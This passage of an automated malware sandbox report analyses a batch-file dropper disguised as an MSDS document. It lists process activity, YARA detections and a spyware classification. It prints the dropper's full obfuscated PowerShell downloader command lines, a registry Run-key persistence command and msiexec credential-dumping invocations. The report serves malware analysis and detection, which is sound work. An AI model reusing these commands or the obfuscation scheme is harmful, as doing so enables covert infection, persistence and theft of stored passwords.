              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347626DD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34766B68
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34766BAA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_045DEDF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_045DF6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_045DEAA8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21BE7194
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21BDB5C1
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004222D9
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6220
              Source: unknown Process created: Commandline size = 6244
              Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6220
              Source: amsi32_6776.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@22/12@3/3
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Unslave.Mel
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-MC4T64
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuwvtkwx.eay.ps1
              Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" "
              Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2912
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6776
              Source: C:\Windows\SysWOW64\reg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2912
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000009.00000002.4597777003.0000000022420000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000F.00000002.2597753288.0000000004D0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2594486228.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit graph_16-33204
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aH
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm I
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
              Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
              Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
